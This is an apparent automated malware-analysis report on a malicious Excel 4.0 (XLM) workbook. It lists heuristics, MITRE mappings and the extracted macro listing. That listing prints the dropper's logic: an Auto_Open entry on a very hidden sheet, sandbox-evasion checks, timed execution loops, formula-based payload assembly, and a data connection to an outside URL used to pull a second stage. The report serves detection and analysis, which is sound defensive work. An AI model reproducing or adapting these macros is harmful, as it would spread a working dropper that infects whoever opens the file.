Verdict: MALICIOUS
Risk Score: 142
Malware Insights
MITRE ATT&CK: T1059.005 Visual Basic; T1203 Exploitation for Client Execution
The file contains Excel 4.0 macros, specifically an Auto_Open macro, which is a critical finding. The macros utilize dangerous functions such as RUN, indicating an attempt to execute arbitrary code. The embedded URL is likely used to download and execute a second-stage payload, a common technique for malware distribution.
Heuristics (4)
- Excel 4.0 Auto_Open defined name (critical, OLE_XLM_AUTOOPEN_DEFINEDNAME): oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
- XLM Auto_Open with dangerous formula APIs (critical, OLE_XLM_DANGEROUS_FN): Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
- Excel 4.0 (XLM) macro sheet present (medium, OLE_XLM_AUTOOPEN): Workbook contains an Excel 4.0 macro sheet sub-stream; XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: https://tdvomds.pw/12341324rfefv (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 3945 bytes |
SHA-256: ee59d85224c1920ac9db3da415149bfcfab2c55289a822195180a77095a65df4
Script preview: first 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 18 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, very hidden - 0TQ1ByZPP
' 0018 40 LABEL : Cell Value, String Constant - _1451345341fff len=11 ptgArea3d *INCOMPLETE FORMULA PARSING* Remaining, unparsed expression: b'\x00\x00E\x00H\x00\x12\x00\x12\x00'
' 0018 30 LABEL : Cell Value, String Constant - agawf23f len=7 ptgRef3d 0TQ1ByZPP!U33
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d 0TQ1ByZPP!H23
' 0018 31 LABEL : Cell Value, String Constant - rstegerg3 len=7 ptgRef3d 0TQ1ByZPP!U35
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
' 0TQ1ByZPP,D23,"WORKBOOK.HIDE("0TQ1ByZPP5",TRUE)",""
' 0TQ1ByZPP,H23,"IF(GET.WORKSPACE(42),,CLOSE(TRUE))",""
' 0TQ1ByZPP,H24,GET.WORKSPACE(13),""
' 0TQ1ByZPP,H25,GET.WORKSPACE(14),""
' 0TQ1ByZPP,H26,"IF(H24<770,CLOSE(FALSE),)",""
' 0TQ1ByZPP,H27,"IF(H25<381,CLOSE(FALSE),)",""
' 0TQ1ByZPP,H28,"IF(GET.WORKSPACE(19),,CLOSE(TRUE))",""
' 0TQ1ByZPP,H29,"IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),ON.TIME(NOW()+"00:00:02","agawf23f"),CLOSE(TRUE))",""
' 0TQ1ByZPP,H30,RETURN(),""
' 0TQ1ByZPP,U33,"IF(ISNUMBER(SEARCH("s", Sheet!S70)),GOTO(P54),ON.TIME(NOW()+"00:00:02","rstegerg3"))",""
' 0TQ1ByZPP,U34,RETURN(),""
' 0TQ1ByZPP,U35,"IF(ISNUMBER(SEARCH("s", Sheet!S70)),GOTO(P54),ON.TIME(NOW()+"00:00:02","agawf23f"))",""
' 0TQ1ByZPP,U36,RETURN(),""
' 0TQ1ByZPP,P54,"FORMULA( Sheet!S70,O54)",""
' 0TQ1ByZPP,P55,"FORMULA( Sheet!S71,O55)",""
' 0TQ1ByZPP,P56,"FORMULA( Sheet!S72,O56)",""
' 0TQ1ByZPP,P57,"FORMULA( Sheet!S73,O57)",""
' 0TQ1ByZPP,P58,"FORMULA( Sheet!S74,O58)",""
' 0TQ1ByZPP,P59,"FORMULA( Sheet!S75,O59)",""
' 0TQ1ByZPP,P60,"FORMULA( Sheet!S76,O60)",""
' 0TQ1ByZPP,P61,"FORMULA( Sheet!S77,O61)",""
' 0TQ1ByZPP,P62,"FORMULA( Sheet!S78,O62)",""
' 0TQ1ByZPP,P63,"FORMULA( Sheet!S79,O63)",""
' 0TQ1ByZPP,P64,"FORMULA( Sheet!S80,O64)",""
' 0TQ1ByZPP,P65,"FORMULA( Sheet!S81,O65)",""
' 0TQ1ByZPP,P66,"FORMULA( Sheet!S82,O66)",""
' 0TQ1ByZPP,P67,"FORMULA( Sheet!S83,O67)",""
' 0TQ1ByZPP,P68,"FORMULA( Sheet!S84,O68)",""
' 0TQ1ByZPP,P69,"FORMULA( Sheet!S85,O69)",""
' 0TQ1ByZPP,P70,"FORMULA( Sheet!S86,O70)",""
' 0TQ1ByZPP,P71,"FORMULA( Sheet!S87,O71)",""
' 0TQ1ByZPP,P72,"FORMULA( Sheet!S88,O72)",""
' 0TQ1ByZPP,P73,"FORMULA( Sheet!S89,O73)",""
' 0TQ1ByZPP,P74,"FORMULA( Sheet!S90,O74)",""
' 0TQ1ByZPP,P75,"FORMULA( Sheet!S91,O75)",""
' 0TQ1ByZPP,P76,"FORMULA( Sheet!S92,O76)",""
' 0TQ1ByZPP,P77,"FORMULA( Sheet!S93,O77)",""
' 0TQ1ByZPP,P78,"FORMULA( Sheet!S94,O78)",""
' 0TQ1ByZPP,P79,"FORMULA( Sheet!S95,O79)",""
' 0TQ1ByZPP,P80,"FORMULA( Sheet!S96,O80)",""
' 0TQ1ByZPP,P81,"FORMULA( Sheet!S97,O81)",""
' 0TQ1ByZPP,P82,"FORMULA( Sheet!S98,O82)",""
' 0TQ1ByZPP,P83,"FORMULA( Sheet!S99,O83)",""
' 0TQ1ByZPP,P84,"FORMULA( Sheet!S100,O84)",""
' 0TQ1ByZPP,P85,"FORMULA( Sheet!S101,O85)",""
' 0TQ1ByZPP,P86,"FORMULA( Sheet!S102,O86)",""
' 0TQ1ByZPP,P87,"FORMULA( Sheet!S103,O87)",""
' 0TQ1ByZPP,P88,"FORMULA( Sheet!S104,O88)",""
' 0TQ1ByZPP,P89,"FORMULA( Sheet!S105,O89)",""
' 0TQ1ByZPP,P90,"FORMULA( Sheet!S106,O90)",""
' 0TQ1ByZPP,P91,"FORMULA( Sheet!S107,O91)",""
' 0TQ1ByZPP,P92,"FORMULA( Sheet!S108,O92)",""
' 0TQ1ByZPP,P93,"FORMULA( Sheet!S109,O93)",""
' 0TQ1ByZPP,P94,GOTO(O54),""
' 0TQ1ByZPP,P95,RETURN(),""
' 0876 139 DCONN : Data Connection
' ASCII:
' Connection
' https://tdvomds.pw/12341324rfefv
' Sheet1!1451345341fff